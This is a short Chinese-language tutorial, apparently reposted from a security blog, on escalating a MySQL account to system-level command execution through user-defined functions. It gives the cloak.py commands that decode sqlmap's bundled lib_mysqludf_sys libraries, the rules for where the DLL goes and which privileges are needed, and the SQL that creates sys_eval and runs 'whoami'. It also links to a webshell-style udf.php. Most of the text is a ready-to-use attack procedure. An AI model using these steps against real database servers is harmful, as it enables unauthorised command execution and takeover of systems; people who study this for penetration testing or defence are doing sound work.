https://www.sqlsec.com/2020/11/mysql.html#toc-heading-10
UDF是mysql的一个拓展接口,UDF(Userdefined function)可翻译为用户自定义函数,这个是用来拓展Mysql的技术手段。
用户通过自定义函数可以实现在Mysql中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用
利用MYSQL的自定义函数功能将Mysql账号转换为system权限
sqlmap根目录/data/udf/mysql
不过 sqlmap 中 自带这些动态链接库为了防止被误杀都经过编码处理过,不能被直接使用。不过可以利用 sqlmap 自带的解码工具cloak.py 来解码使用,cloak.py 的位置为:/extra/cloak/cloak.py ,解码方法如下
# 解码 32 位的 Linux 动态链接库
? python3 cloak.py -d -i ../../data/udf/mysql/linux/32/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_32.so
# 解码 64 位的 Linux 动态链接库
? python3 cloak.py -d -i ../../data/udf/mysql/linux/64/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so
# 解码 32 位的 Windows 动态链接库
? python3 cloak.py -d -i ../../data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll
# 解码 64 位的 Windows 动态链接库
? python3 cloak.py -d -i ../../data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll
具体dll的下载链接,可在参考链接中找到
1、如果Mysql版本大于5.1,udf.dll放到Mysql安装目录的lib\plugin文件夹下
2、如果Mysql版本小于5.1,在Windows 2003下放于c:\windows\system32目录,在Win2000下,放入C:\winnt\system32目录
3、有Mysql的insert和delete权限,以创建和抛弃函数。一般以root账号为最佳。select * from mysql.user where user=‘test‘
4、拥有可以将udf.dll写入相应目录的权限
CREATE FUNCTION sys_eval RETURNS STRING SONAME ‘udf.dll‘;
导入成功后查看一下 mysql 函数里面是否新增了 sys_eval:
select * from mysql.func;
select sys_eval(‘whoami‘)
删除自定义函数
drop function sys_eval;
1、可以使用:udf.php
https://github.com/echohun/tools/blob/master/大马/udf.php
2、也可以使用Navicat MySQL的隧道功能
传入ntunnel_mysql.php文件,然后使用工具连接即可
原文:https://www.cnblogs.com/sakura521/p/14967725.html